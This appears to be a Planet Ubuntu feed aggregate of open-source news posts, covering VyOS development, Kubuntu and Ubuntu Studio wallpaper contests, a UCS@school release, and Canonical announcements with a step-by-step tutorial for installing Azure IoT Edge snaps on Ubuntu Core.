<p>Hello, Community!<br />While VyOS 1.4/Sagitta has taken its final shape, and we are working to smoothen any remaining sharp edges (especially in migration scripts), the upcoming 1.5/Circinus branch is the new frontier where we can go wild and experiment freely. Safe features from the current branch are still backported to 1.4/Sagitta.</p>
<p>Still, we already have non-back portable features — such as improvements to the new DHCP server implementation based on Kea rather than the now-obsolete ISC DHCP server.<br />In the last month, there were quite a few improvements, including the ability to set multiple peer addresses for unicast VRRP (a feature by our new core team member Natalia Solomko), segment routing support for static IPv6 routes, support for SSH public keys in the PKI subsystem, and more.</p>
<h2></h2>Erkin Batu Altunbase.altunbas@vyos.ioKubuntu General News: Kubuntu Wallpaper 24.04 – Call for Submissionshttps://kubuntu.org/?p=51682024-03-22T08:19:03+00:00<p>We are excited to announce a call for submissions for the official desktop wallpaper of Kubuntu 24.04! This is a fantastic opportunity for artists, designers, and Kubuntu enthusiasts to showcase their talent and contribute to the visual identity of the upcoming Kubuntu release.</p>
<h3>What We’re Looking For</h3>
<p>We are in search of unique, inspiring, and beautiful wallpapers that reflect the spirit of Kubuntu and its community. Your design should captivate users with its creativity, while also embodying the essence of Kubuntu’s commitment to freedom, elegance, and technical excellence.</p>
<h3>Submission Guidelines</h3>
<p><strong>Resolution:</strong> Submissions must be at least 3840×2160 pixels to ensure high quality on all displays.</p>
<p>**Format: **JPEG or PNG format is preferred.</p>
<p><strong>Original Work:</strong> Your submission must be your original work and not include any copyrighted material unless you have permission to use it.</p>
<p><strong>Theme:</strong> While we encourage creativity, your design should be suitable for a wide audience and align with the values and aesthetics of the Kubuntu community.</p>
<h3>How to Submit</h3>
<p>Please send your wallpaper submissions to Rick Timmis of the Kubuntu Council, via one of:</p>
<ul><li>Telegram: <a href="https://t.me/Rick_Timmis" rel="noreferrer noopener" target="_blank">https://t.me/Rick_Timmis</a></li><li>Matrix: @rick-timmis:ubuntu.com</li><li>Mastodon: @<a href="mailto:RickTimmis@mastodon.social">RickTimmis@mastodon.social</a></li><li>Email: <a href="mailto:rick-timmis@kubuntu.org">rick-timmis@kubuntu.org</a></li><li>IRC: irc.libera.chat #kubuntu-devel @rick-timmis.</li></ul>
<h3>Deadline</h3>
<p>The deadline for submissions is March 31, 2024. We will review all submissions and select the design(s) to be included as part of the Kubuntu 24.04 release. The selected artist(s) will receive credit in the release notes and across our social media platforms, showcasing your contribution to users worldwide.</p>
<h3>Let Your Creativity Shine</h3>
<p>This is your chance to leave a mark on the Kubuntu community and be a part of the journey towards an exciting new release. We can’t wait to see your submissions and the diverse interpretations of what Kubuntu represents to you.</p>
<p>Embrace this opportunity to let your creativity shine and help make Kubuntu 24.04 the most visually stunning release yet. Good luck to all participants!</p>Ubuntu developershttp://planet.ubuntu.com/UCS@school 5.0 v5 Releasedhttps://www.univention.de/?p=686372024-03-22T07:31:06+00:00<section class="wpb-content-wrapper"><div class="univention-row default univention-row--padding-45 color-scheme-default"><div class="univention-container"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
<div class="wpb_text_column wpb_content_element ">
<div class="wpb_wrapper">
<p>UCS@school 5.0 v5, the fifth patch level release of UCS@school 5.0, is now available, containing a number of fixes and improvements, some of which I would like to highlight.<span id="more-68637"></span></p>
<h2>Importer now accepts different encodings as input format</h2>
<p>The UCS@school Importer now officially accepts input files encoded not only in UTF-8 but also alternatively in UTF-16, both Little Endian and Big Endian. Additionally, user guidance has been improved in case an unsupported encoding is used.</p>
<h2>Detection of the output format of class list exports optimized</h2>
<p>Class list exports are available in two formats. To optimize compatibility with different programs for further processing, the browser now communicates how the chosen format is structured, allowing subsequent programs to utilize this information.</p>
<h2>Improved robustness of computer imports</h2>
<p>Previously, there could be issues during computer imports if the subnet mask was accidentally specified as an IP address or if multiple MAC addresses were provided. Overall, the robustness for these cases has been improved such that faulty inputs are now detected and reported before import, and handling multiple MAC addresses later proceeds smoothly.</p>
<h2>Release Notes</h2>
<p>A comprehensive list of all the new features and changes can be found in our changelog. If you have any suggestions or improvement ideas, we welcome your feedback here on the blog or on <a href="https://help.univention.com/">help.univention.com</a>.</p>
</div>
</div>
</div></div></div></div></div></div>
</section><p>Der Beitrag <a href="https://www.univention.com/blog-en/2024/03/ucsschool-5-0-v5/">UCS@school 5.0 v5 Released</a> erschien zuerst auf <a href="https://www.univention.com">Univention</a>.</p>Jan-Luca Kiokhttps://www.univention.com/news/blog-en/Ubuntu Studio: Wallpaper Competition Winners 24.04 LTShttps://ubuntustudio.org/?p=27272024-03-21T21:22:45+00:00<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2729" height="360" src="https://ubuntustudio.org/wp-content/uploads/2024/03/0cd3/wallpaperwinners.jpg" width="640" /></figure></div>
<h2>A Crowning Achievement</h2>
<p>As 24.04 LTS will represent the eighth Long-Term Support release of Ubuntu Studio and its 32nd release. For this release, we wanted to make sure we got some great representation from the community in terms of wallpaper, and while there weren’t as many entries as our previous competition, we were blown out of the way in terms of quality. While not every wallpaper could be included, all of the entries were solid, and narrowing it down to the best of the best was very difficult.</p>
<h2>Revealing The Default</h2>
<p>Our long-time art lead, Eylul Dogruel, worked diligently on making a quality textured default wallpaper that not only works well for traditional horizontal screens, but for vertical screens as well without losing quality. We have two variations: one with our logo, and one with the mascot that will be rotated-out for the next four releases.</p>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2730" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/671a/2404default.jpg" width="480" /></figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2731" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/729f/2204noble.jpg" width="480" /></figure></div>
<h2>Now to Crown the Winners!</h2>
<p>As stated, this was a very difficult decision, but we would like to congratulate the winners of the competition! The full-quality images will be included in Ubuntu Studio 24.04 LTS and are already in our daily builds of Noble Numbat.</p>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2732" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/f2c7/94a551c06b7e5ae6dc12d93da44469008a56ce92.jpeg" width="480" />Interference by Uday Nakade</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2733" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/e3f3/866871a44e782dbed2854b0c8c6ed9a483d0cc6b.jpeg" width="480" />Glass Wave 1 Light by Alastair Temple</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2734" height="320" src="https://ubuntustudio.org/wp-content/uploads/2024/03/d6f7/151b1b72cd90c4db2ae77f83708be1d2457fd67d.jpeg" width="480" />Bee 2 by Liber Dovat</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2735" height="267" src="https://ubuntustudio.org/wp-content/uploads/2024/03/ebbf/8c96b2dc893761e2e69f3d8f381dc60493689e64.jpeg" width="480" />Brauneck Sunrise by Uday Nakade</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2736" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/c0ad/8d34c315efd8bfd4f3558953b25a6cbd277e91c7.jpeg" width="480" />Banaue by Jean-Daniel Bancal</figure></div>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Getting Started with Azure IoT Edge on Ubuntu Corehttps://ubuntu.com//blog/getting-started-with-azure-iot-edge-on-ubuntu-core2024-03-21T10:35:00+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="268" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_512,h_268/https://ubuntu.com/wp-content/uploads/c1b9/get-started-azure-snap.png" width="512" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Introduction</h2>
<p>Earlier this month/week, we announced that you can now benefit from the combined power of Ubuntu Core and Azure IoT Edge to bring the computation, storage, and AI capabilities of the cloud closer to the edge of the network. Azure IoT Edge is a device-focused runtime that enables you to deploy, run, and monitor containerised Linux workloads. Ubuntu Core is a version of Ubuntu that has been specially optimised for IoT and embedded systems. The combination of the two is ideal for those looking for reduced latency, lower bandwidth, and more efficient data processing. </p>
<p>This tutorial helps you get started using an Ubuntu Core device and managing it from the Azure IoT Hub. Azure IoT Hub is the cloud platform which allows you to connect to, configure and deploy Edge workloads directly to your device.</p>
<h2 class="wp-block-heading">Setting up Ubuntu Core</h2>
<p>Ubuntu Core is a minimal, immutable version of Ubuntu focused on providing a reliable and secure platform for connected devices. </p>
<h3 class="wp-block-heading">Create an Ubuntu SSO Account</h3>
<p>Before you can create an Ubuntu Core device, you need to ensure you can connect to it after initial configuration. This will require an Ubuntu SSO account and an SSH keypair. </p>
<p>You can skip this step if you already have an account. If you do not have an SSO account, you can sign up for one here:</p>
<p><a href="https://login.ubuntu.com/">https://login.ubuntu.com/</a></p>
<h3 class="wp-block-heading">SSH Keys</h3>
<p>In order to authenticate yourself when trying to connect to your Ubuntu Core device, you will need to upload a public SSH key to your SSO account. This will then be automatically downloaded to the Core device during initial configuration.</p>
<p>To generate and upload an SSH key pair, please follow the steps detailed in the link below:</p>
<p><a href="https://ubuntu.com/core/docs/connect-with-ssh">Connect to Ubuntu Core with SSH</a></p>
<p>You may also want to come back to this information once you have configured your Core device in the next stage.</p>
<h3 class="wp-block-heading">Obtaining and configuring an Ubuntu Core Device</h3>
<p>For the next stage in the process you will need an IoT device running Ubuntu Core. This can either be a physical device, such as a raspberry pi, or a virtual device on your desktop. </p>
<p>You can find all the available Ubuntu Core images, ready to download at: <a href="https://ubuntu.com/certified/iot">https://ubuntu.com/certified/iot</a> </p>
<p>To set up a virtual device, you can use QEMU to emulate your desired hardware. Please follow these instructions to complete this phase:</p>
<p><a href="https://ubuntu.com/core/docs/testing-with-qemu">Testing Ubuntu Core with QEMU</a></p>
<p>Independently of which option you chose, you should now have a fully working Ubuntu Core device that you can connect to via SSH. You are now ready to provision it for Microsoft Azure.</p>
<h3 class="wp-block-heading">Installing Azure IoT Edge Snaps</h3>
<p>Having created and connected to your Ubuntu Core device, the next step is to install the Azure snaps.</p>
<p>Microsoft provides four snaps for your Ubuntu Core device: </p>
<ul>
<li>The Identity snap authenticates your device with the Azure cloud.</li>
<li>The Device Agent snap ensures your device is up-to-date. </li>
<li>The Edge snap manages your cloud-deployed workloads on the device. </li>
<li>The Delivery Optimization agent manages downloads of payloads from the Azure cloud.</li>
</ul>
<p>In addition, Azure’s workloads are distributed as Docker containers and you therefore need to install the Docker Snap to run these.</p>
<p>All five snaps can be installed from your SSH terminal using the following commands:</p>
<pre class="wp-block-code"><code>snap install azure-iot-identity
snap install azure-iot-edge
snap install deviceupdate-agent
snap install deliveryoptimization-agent
snap install docker</code></pre>
<p>Note: if you are being asked to use <strong><em>sudo </em></strong>to run snap install, you may need to authenticate yourself with the snap store using <strong><em>sudo snap login <email address></em></strong>. This will then allow you to perform all snap commands without root privileges.</p>
<h3 class="wp-block-heading">Wiring up slots and plugs</h3>
<p>By default, <a href="https://discourse.ubuntu.com/t/snaps-in-ubuntu-core/19730">snaps</a> are dependency-free, untrusted, and strictly confined hence they must be connected to other snaps and system resources once installed using interfaces. Each snap has a selection of plugs and slots that either request or provide certain access. For production deployments, they can be configured to automatically connect to reduce the provisioning workload but to get started you may need to manually configure some of them to ensure they have all the permissions they need.</p>
<p>If installing the snaps from the global snap store, most interfaces will already be connected for you, however there are a few you may need to manually configure.</p>
<p>From an SSH terminal, you can check which interfaces are already connected using the following commands for each snap:</p>
<pre class="wp-block-code"><code>undefined
snap connections azure-iot-identity
snap connections azure-iot-edge
snap connections deviceupdate-agent
snap connections deliveryoptimization</code></pre>
<p>For each snap you will be presented with a list of the interfaces. If the slot is empty, it may need connecting. For example, if you get the following response from snap connections <em>azure-iot-identity</em>:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="241" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1210,h_241/https://ubuntu.com/wp-content/uploads/642d/image.png" width="1210" />
</noscript>
</div>
</figure>
<p>We can see that some interfaces have been connected but the identity snap can not access hostname information, log information, mount information, system information or the tpm. We need to manually connect them which we can do from our terminal:</p>
<pre class="wp-block-code"><code>undefined
snap connect azure-iot-identity:log-observe
snap connect azure-iot-identity:mount-observe
snap connect azure-iot-identity:system-observe
snap connect azure-iot-identity:tpm
snap connect azure-iot-identity:hostname-control</code></pre>
<p>The format of this command is<strong><em> snap connect <plug> <slot> </em></strong>but as we are connecting to snapd system slots we do not need to specify them. </p>
<h3 class="wp-block-heading"><strong>IoT Edge</strong></h3>
<p>For the IoT Edge agent, we can go through a similar process but this time we also want to connect from one snap (Edge agent) to another (Docker). The following commands should cover all unconnected interfaces.</p>
<pre class="wp-block-code"><code># Connect to logging and grant permission to query system info
snap connect azure-iot-edge:log-observe
snap connect azure-iot-edge:mount-observe
snap connect azure-iot-edge:system-observe
snap connect azure-iot-edge:hostname-control
# Connect IoT Edge to Docker
snap connect azure-iot-edge:docker docker:docker-daemon</code></pre>
<h3 class="wp-block-heading"><strong>IoT Device agent</strong></h3>
<pre class="wp-block-code"><code>undefined
# Connect to logging and grant permission to query system info
snap connect deviceupdate-agent:account-control
snap connect deviceupdate-agent:hardware-observe
#Connect to SnapD
snap connect deviceupdate-agent:snapd-control
#Connect to other Azure Snaps
snap connect deviceupdate-agent:identity-service azure-iot-identity:identity-service</code></pre>
<p>With all the interfaces now connected, we are ready to move onto the connecting to the cloud. </p>
<h2 class="wp-block-heading">Setting up your Azure IoT Edge account</h2>
<p>For the next step, you need to move to the cloud and the Azure IoT Edge portal. If you already have an Azure account, you can sign in here: </p>
<p><a href="https://portal.azure.com/">Azure Portal</a></p>
<p>If you do not have an account, you can sign up for an account here:</p>
<p><a href="https://azure.microsoft.com/en-gb/products/iot-edge">Azure IoT Edge</a></p>
<p>You will be given the option to either create a free account (which includes a time-limited, preview credit) or a paid account with access to premium services. Both Azure IoT Hub and Azure IoT Edge are free services that can be used without charge provided you stay within Azure’s usage limitations. More information can be found on this <a href="https://azure.microsoft.com/en-us/pricing/free-services">here</a>.</p>
<p>Once you have access to your Azure account and the Azure Portal, you will need to create your IoT Hub. From the Azure services section of the portal, click “More services” and select “IoT Hub” from the “Internet of Things” section.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="503" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_783,h_503/https://ubuntu.com/wp-content/uploads/69c2/image.png" width="783" />
</noscript>
</div>
</figure>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="684" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_778,h_684/https://ubuntu.com/wp-content/uploads/ce5b/image.png" width="778" />
</noscript>
</div>
</figure>
<p>Once in your IoT Hub, you need to create a Hub. Click the Create button and fill in the details. Once happy, click the ‘Create’ button.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="655" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_781,h_655/https://ubuntu.com/wp-content/uploads/e13c/image-2.png" width="781" />
</noscript>
</div>
</figure>
<p>After a brief pause, your Hub will have been deployed and we can now see it in the IoT Hub portal.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="361" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1169,h_361/https://ubuntu.com/wp-content/uploads/31d1/image.png" width="1169" />
</noscript>
</div>
</figure>
<p>Select your Hub and, from the menu on the right hand side of the screen, select Devices. </p>
<p>Click “Add Device”, choose a name for your device and select the “IoT Edge Device” checkbox. Choose any other settings you desire and click “Save”.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="716" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_702,h_716/https://ubuntu.com/wp-content/uploads/28cc/image-1.png" width="702" />
</noscript>
</div>
</figure>
<p>Again after a slight pause, your device will have been created and added to your Hub. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="421" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1166,h_421/https://ubuntu.com/wp-content/uploads/715a/image.png" width="1166" />
</noscript>
</div>
</figure>
<p>Select your device from your Hub and you will be presented with the various options and information. For the moment, we are just interested in the “Primary connection string” as we will need this to provision the actual device. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="640" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1150,h_640/https://ubuntu.com/wp-content/uploads/4d9a/image-1.png" width="1150" />
</noscript>
</div>
</figure>
<p>You can view the connection string by clicking on the small eye icon or copy it to your clipboard by clicking the icon to the right. </p>
<h2 class="wp-block-heading">Provisioning your Device</h2>
<p>In order for your Core device to connect to your newly created IoT Hub, it needs to be</p>
<p>configured with the connection string we have just obtained. </p>
<p>Returning to the SSH terminal of your Core device, create a file called <em>config.toml</em>.</p>
<p>At this point it may be useful to install a text editor onto your Core device. Follow the steps below to install the nano strictly confined snap and connect it to your home directory. Then open the config.toml file to edit</p>
<pre class="wp-block-code"><code>sudo snap install nano-strict
snap connect nano-strict:home :home
nano-strict config.toml</code></pre>
<p>Copy and paste the following into your text editor but replace the connection string with the one you obtained from your IoT Hub Device. </p>
<pre class="wp-block-code"><code>## Manual provisioning with connection string
#
[provisioning]
source = "manual"
connection_string = "HostName=snaphub-free.azure-devices.net;DeviceId=iotvm;SharedAccessKey=XXXXXXXXX"</code></pre>
<p>Apply that configuration file to your Azure Snap using the following command:</p>
<pre class="wp-block-code"><code>sudo snap set azure-iot-edge raw-config="$(cat config.toml)"</code></pre>
<p>It is also possible to authenticate your device to the Azure IoT Hub using X.509 certificates. For information on how to use that method, please refer to <a href="https://learn.microsoft.com/en-us/azure/iot-edge/how-to-provision-single-device-linux-x509?view=iotedge-1.4&tabs=azure-portal%2Cubuntu">this</a> documentation from Microsoft. </p>
<h2 class="wp-block-heading">Your Device in Azure IoT Hub</h2>
<p>Once configured, your device will download some containers to allow it to run Azure IoT Edge workloads. This may take some time depending on your network connection speed but once complete your device will be visible from your Azure portal and you can configure it with additional workloads from there as well as explore all the offerings Azure has for your device. </p>
<p><a href="https://learn.microsoft.com/en-us/azure/iot-edge/how-to-deploy-modules-portal?view=iotedge-1.4">Deploying Modules to your Device</a></p>
<h2 class="wp-block-heading">Next Steps</h2>
<p>You should now have a fully working and configured Ubuntu Core device which can be remotely managed with the Azure IoT Hub. From here you can explore the features Azure IoT has to offer. </p>
<p>If you want to try and deploy your first module to your Edge device, <a href="https://learn.microsoft.com/en-gb/azure/iot-edge/quickstart-linux?view=iotedge-1.4#deploy-a-module">this tutorial</a> from Microsoft shows you how you can deploy a sensing module that will send simulated telemetry data from your device to the cloud. It is the perfect place to get started with your Ubuntu Core Azure IoT Edge device. </p>
<p>For more information on what you can do with Azure IoT, please refer to the Microsoft documentation.</p>
<p><a href="https://learn.microsoft.com/en-us/azure/iot-edge/?view=iotedge-1.4">Azure IoT Edge documentation | Microsoft Learn</a> </p>
<p>For more information on the power and capabilities of Ubuntu Core please refer to <a href="https://ubuntu.com/core">Ubuntu Core</a>.</p>Ubuntu developershttp://planet.ubuntu.com/Podcast Ubuntu Portugal: E291 Santo Seppukuhttps://media.blubrry.com/ubuntupt/archive.org/download/pup-e291/e291.mp32024-03-21T00:00:00+00:00<p>Watashitachi no komyuniti wa kyōryokudesu! O Diogo errou e os seus antepassados exigem que ele lave a honra do podcast. Agora sim, este país vai para a frente, agora que a PC Guia lançou uma <em>pen</em> com distribuições GNU-Linux para educar o povo! A ANSOL conquista cada vez mais terreno nos <em>media</em>, a sua assembleia geral foi repleta de aplausos, desfiles e bandeirinhas e o software livre marcha em direcção aos amanhãs que cantam! Entretanto, o Miguel não gosta de bancos; a Canonical continua a ter problemas com aplicações de criptomoedas; o Firefox está cheio de coisinhas boas e vem aí o Ubuntu 24.04 LTS com belos fundos de ecrã!</p>
<p>Já sabem: oiçam, subscrevam e partilhem!</p>
<ul>
<li>
<p><a href="https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300/179">https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300/179</a></p>
</li>
<li>
<p><a href="https://ubuntu.com/blog/the-coronation-of-a-new-mascot-noble-numbat">https://ubuntu.com/blog/the-coronation-of-a-new-mascot-noble-numbat</a></p>
</li>
<li>
<p><a href="https://ansol.org/eventos/2024-03-24-open-knowledge-braga-2024/">https://ansol.org/eventos/2024-03-24-open-knowledge-braga-2024/</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319195823/https%3A%2F%2Fansol.org%2Feventos%2F2024-03-24-open-knowledge-braga-2024%2F">https://web.archive.org/web/20240319195823/https%3A%2F%2Fansol.org%2Feventos%2F2024-03-24-open-knowledge-braga-2024%2F</a></p>
</li>
<li>
<p><a href="https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024">https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319200112/https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024">https://web.archive.org/web/20240319200112/https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024</a></p>
</li>
<li>
<p><a href="https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/">https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319202559/https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/">https://web.archive.org/web/20240319202559/https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/">https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319201849/https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/">https://web.archive.org/web/20240319201849/https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://loco.ubuntu.com/teams/ubuntu-pt/">https://loco.ubuntu.com/teams/ubuntu-pt/</a></p>
</li>
<li>
<p><a href="https://shop.nitrokey.com/shop?aff_ref=3">https://shop.nitrokey.com/shop?aff_ref=3</a></p>
</li>
<li>
<p><a href="https://masto.pt/@pup">https://masto.pt/@pup</a></p>
</li>
<li>
<p><a href="https://youtube.com/PodcastUbuntuPortugal">https://youtube.com/PodcastUbuntuPortugal</a></p>
</li>
</ul>
<h3 id="apoios">Apoios</h3>
<p>Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal.
E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8.
Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem.
Se estiverem interessados em outros bundles não listados nas notas usem o link <a href="https://www.humblebundle.com/?partner=PUP">https://www.humblebundle.com/?partner=PUP</a> e vão estar também a apoiar-nos.</p>
<h3 id="atribuição-e-licenças">Atribuição e licenças</h3>
<p>Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo <a href="https://senhorpodcast.pt/">Senhor Podcast</a>.
O website é produzido por Tiago Carrondo e o <a href="https://gitlab.com/podcastubuntuportugal/website">código aberto</a> está licenciado nos termos da <a href="https://gitlab.com/podcastubuntuportugal/website/main/LICENSE">Licença MIT</a>.
A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da <a href="https://creativecommons.org/publicdomain/zero/1.0/">CC0 1.0 Universal License</a>.
Este episódio e a imagem utilizada estão licenciados nos termos da licença: <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/">Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)</a>, <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode">cujo texto integral pode ser lido aqui</a>. Estamos abertos a licenciar para permitir outros tipos de utilização, <a href="https://podcastubuntuportugal.org/contactos">contactem-nos</a> para validação e autorização.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical’s Ubuntu Core receives Microsoft Azure IoT Edge Tier 1 supported platform statushttps://ubuntu.com//blog/canonicals-ubuntu-core-receives-microsoft-azure-iot-edge-tier-1-supported-platform-status2024-03-20T09:24:48+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="289" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_512,h_289/https://ubuntu.com/wp-content/uploads/3027/azure-snap-announcement-header.png" width="512" />
</noscript>
</div>
</figure>
<p><strong>London, 20 March 2024. </strong>Canonical has announced that Ubuntu Core, its operating system optimised for the Internet of Things (IoT) and edge, has received Microsoft Azure IoT Edge Tier 1 supported platform status from Microsoft. This collaboration brings computation, storage, and artificial intelligence (AI) capabilities in the cloud closer to the edge of the network. </p>
<h2 class="wp-block-heading">The power of the cloud on the edge</h2>
<p>Azure IoT Edge enables businesses to remotely and securely deploy and manage cloud-native workloads directly on their IoT devices, at scale, and with robust observability.</p>
<p>With the ability to deploy and manage containerised applications on devices, teams can process data, run machine learning models, perform analytics, and carry out other tasks right at the edge of the network. This approach helps reduce latency, conserve bandwidth, and it provides more immediate insights from data near to where it is generated. It is especially useful in scenarios where real-time decision-making is crucial, where network connectivity might be unreliable, or where data privacy and security concerns demand local data processing.</p>
<h2 class="wp-block-heading">The security of Ubuntu Core</h2>
<p>Ubuntu Core is an operating system designed specifically for the IoT and embedded devices. Its range of features make it ideal for secure, reliable, and scalable deployments. Built on the power of Snaps, Ubuntu Core provides a minimal core with support for multiple architectures and types of devices. Security is baked-in with secure boot and full disk encryption, and over-the-air (OTA) transactional updates to ensure that devices are always up to date. Coupled with Canonical’s Long Term Support, which offers up to 10 years of maintenance and security updates, Ubuntu Core provides long-term peace of mind for IoT implementations.</p>
<p>With the introduction of the Azure IoT Edge Snaps suite, the process of deploying edge workloads to the extensive array of devices and architectures supported by Ubuntu Core has become a streamlined, seamless, experience. Combined with the ability to remotely manage and configure both the processing and system components of fleets of devices directly from Azure, teams benefit from robust security and optimised performance. </p>
<blockquote class="wp-block-quote">
<p><em>“With Microsoft committing their support for Ubuntu Core with the release of the Microsoft Azure IoT Edge Snaps we see another example of the industry’s enthusiasm to adopt the operating system to fulfil all of their IoT needs. We look forward to growing this relationship further with Microsoft in the future”. – Michael Croft-White, Engineering Director.</em></p>
<p><em>“In collaboration with Canonical, we are making it simpler to reliably connect devices to Microsoft Azure IoT services. Snap support in Azure IoT Edge helps ensure consistent performance, enhanced security, and efficient updates across Linux distributions that support Snaps.” </em></p>
<cite><em>Kam VedBrat, GM, Azure IoT</em></cite></blockquote>
<h2 class="wp-block-heading">Further reading</h2>
<p>More information on Ubuntu Core can be found at <a href="https://ubuntu.com/core">ubuntu.com/core</a>. Our “<a href="https://ubuntu.com/engage/technical-intro-ubuntu-core22">Intro to Ubuntu Core 22</a>” webinar is a comprehensive resource for everything you need to know about Ubuntu Core. </p>
<p>If you are not already familiar with Microsoft’s Azure IoT Edge, more information can be found <a href="https://learn.microsoft.com/en-us/azure/iot-edge/?view=iotedge-1.4">here</a>. </p>
<p>Are you interested in running Ubuntu Core with Azure IoT on your devices and are working on a commercial project?</p>
<div class="wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex">
<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://ubuntu.com/internet-of-things#get-in-touch">Get in touch</a></div>
</div>
<h2 class="wp-block-heading"><strong>About Canonical</strong> </h2>
<p>Canonical, the publisher of Ubuntu, provides open-source security, support and services. Our portfolio covers critical systems, from the smallest devices to the largest clouds, from the kernel to containers, from databases to AI. With customers that include top tech brands, emerging startups, governments and home users, Canonical delivers trusted open source for everyone.</p>Ubuntu developershttp://planet.ubuntu.com/(中文) 深度相遇,古都畅谈!3月30日(周六)deepin Meetup 西安站等你!https://www.deepin.org/?p=333942024-03-20T08:43:48+00:00Sorry, this entry is only available in 中文.aidahttps://www.deepin.org/enUbuntu Blog: Implementing an Android™ based cloud game streaming service with Anbox Cloudhttps://ubuntu.com//blog/implementing-an-android-based-cloud-game-streaming-service-with-anbox-cloud2024-03-20T08:37:25+00:00<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" height="820" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1439,h_820/https://ubuntu.com/wp-content/uploads/6ca1/Screen-Shot-2020-01-20-at-15.39.57.png" width="1439" />
</noscript>
</div>
</figure></div>
<p>Since the outset, <a href="http://www.anbox-cloud.io">Anbox Cloud</a> was developed with a variety of use cases for running Android at scale. Cloud gaming, more specifically for casual games as found on most user’s mobile devices, is the most prominent one and growing in popularity. Enterprises are challenged to find a solution that can keep up with the increasing user demand, provide a rich experience and keep costs affordable while shortening the time to market.</p>
